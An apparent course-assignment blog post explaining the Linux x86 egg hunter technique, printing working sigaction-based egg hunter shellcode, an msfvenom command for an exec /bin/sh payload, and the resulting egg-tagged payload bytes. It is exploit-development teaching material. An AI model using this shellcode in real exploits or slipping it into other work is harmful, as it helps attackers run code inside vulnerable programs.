Assignment Task:
Study about the Egg Hunter shellcode
Create a working demo of the Egghunter
Should be configurable for different payloads
About Egg Hunters
Egg Hunter is a mechanism to locate a piece of code in an application’s Virtual Address Space (VAS). This technique is primarily used in exploits where the accessible buffer space is insufficient for the payload shellcode to be placed. The Egg Hunter works in following manner:
The payload shellcode is prepended with a tag, aka Egg, twice and stored in the VAS.
The Egg Hunter shellcode then executes and locates this pattern of EGGEGG. It continously scans memory addresses until this pattern is found.
Once found, it transferes the control to the payload shellcode.
The Egg Hunter shellcode should be robust, small and fast.
Egg Hunter Shellcode
For the purpose of this article, I will be using the sigaction egg hunter code mentioned in this paper. This egg hunter code uses sigaction syscall to validate the given address. This approach allows multiple addresses to be validated at a single time by taking advantage of the kernel’s verify_area routine:
NASM file with above code can be found here
Objdump output after assembling and linking it:
Commnad: objdump ./egg-hunter.o -d -M intel
Generating shellcode from this file:
Egg hunter shellcode:
"\x31\xc9\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7"
Executing the egg hunter
Testing this shellcode with the run_shellcode.c file available here. The run_shellcode file contails two variables, one storing the egg hunter shellcode and the other storing the payload shellcode. The payload shellcode was generated using this command:
msfvenom -p linux/x86/exec CMD=/bin/sh -b '\x00' -f c
Payload shellcode prepended with egg:
"\x90\x50\x90\x50\x90\x50\x90\x50\xdd\xc6\xd9\x74\x24\xf4\x58\xbf\xe3\xba\x46\x85\x29\xc9\xb1\x0b\x31\x78\x1a\x83\xe8\xfc\x03\x78\x16\xe2\x16\xd0\x4d\xdd\x41\x77\x34\xb5\x5c\x1b\x31\xa2\xf6\xf4\x32\x45\x06\x63\x9a\xf7\x6f\x1d\x6d\x14\x3d\x09\x65\xdb\xc1\xc9\x59\xb9\xa8\xa7\x8a\x4e\x42\x38\x82\xe3\x1b\xd9\xe1\x84"
Compiling and executing this file:
Github repository for this assignment: Assignment 3